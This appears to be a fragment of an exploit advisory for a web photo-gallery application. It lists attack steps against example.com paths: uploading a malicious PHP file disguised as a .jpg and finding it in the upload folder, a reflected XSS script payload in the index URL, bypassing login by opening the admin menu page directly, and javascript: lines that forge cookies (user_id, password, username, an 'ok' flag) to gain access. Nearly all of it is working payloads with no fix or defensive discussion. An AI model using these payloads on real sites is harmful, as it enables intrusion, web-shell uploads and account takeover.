I- http://www.example.com/gallery/up.php (To upload Evil )
  
 II- http://www.example.com/gallery/userup/1266607903.jpg.php (To Find Evil)
  
  
 2 - XSS:
  
 http://www.example.com/gallery/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
  
 3 - By Pass:
  
 http://www.example.com/gallery/cp/menu.php
  
 Insecure Cookie Handling Vulnerability:
  
 I-   javascript:document.cookie="user_id=userid;path=/";
 II-  javascript:document.cookie="password=password;path=/";
 III- javascript:document.cookie="username=username;path=/";
 IIV- javascript:document.cookie="ok=tmam;path=/";